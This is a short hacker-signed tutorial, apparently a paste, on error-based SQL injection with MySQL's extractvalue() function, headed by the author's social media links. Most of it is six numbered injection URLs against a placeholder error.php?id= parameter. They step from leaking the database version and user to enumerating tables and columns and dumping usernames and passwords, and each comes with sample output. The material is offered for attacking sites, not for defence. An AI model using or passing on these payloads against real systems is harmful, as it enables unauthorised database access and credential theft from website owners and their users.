SQL injection - with Extractvalue () | (by zurael_sTz)

1. <===============Hacker zurael sTz===============>
2. =================twitter=============================
3. https://twitter.com/zurael_stz
4. =================facebook============================
5. https://www.facebook.com/sTzisrael/
6. =====================================================
7. =================telegram============================
8. https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
9. =====================================================
10. <===============Hacker zurael sTz===============>
11.  
12.  
13. SQL injection using the xml function extractvalue() to extract data
14.  
15.  
16.  
17. 1 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))--
18.  
19. Result:
20. 'Xpath syntax error: 5.5.9:user@localhost'
21.  
22.  
23. 2 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3c,table_name) from information_schema.tables limit 85,1)))--
24.  
25. Result:
26. 'Xpath syntax error: :users'
27.  
28.  
29. 3 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1050,1)))--
30.  
31. Result:
32. 'Xpath syntax error: :username'
33.  
34.  
35. 4 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1150,1)))--
36.  
37. Result:
38.  
39. 'Xpath syntax error: :password'
40.  
41.  
42. 5 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users)))--
43.  
44. Result:
45. 'Xpath syntax error: :Admin:password1'
46.  
47. OR
48.  
49. 6 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users limit 1,1)))--
50.  
51. #zurael_sTz